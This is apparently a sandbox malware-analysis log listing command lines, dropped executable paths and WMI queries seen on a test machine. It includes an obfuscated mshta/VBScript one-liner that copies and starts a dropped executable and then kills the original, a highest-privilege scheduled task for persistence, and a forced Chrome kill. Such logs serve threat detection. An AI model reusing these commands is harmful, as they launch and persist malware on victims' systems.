cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST |
cmdline | cmd.exe /c taskkill /f /im chrome.exe |
cmdline | "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE )) |
file | C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe |
file | C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe |
file | C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe |
file | C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe |
file | C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe |
file | C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe |
file | C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe |
file | C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe |
file | C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe |
file | C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe |
file | C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe |
file | C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe |
file | C:\Users\test22\AppData\Local\Temp\QVNGp.I |
file | C:\Users\test22\AppData\Local\Temp\is-1PC33.tmp\Gul5rTCKpjXo0MogByz6Rjtk.tmp |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\is-3QENA.tmp\pImS5RWnyPoH71MUnlZxfr7l.tmp |
file | C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "L_0PQ1nH1s1hf_DH8W5V8AUl.exe") |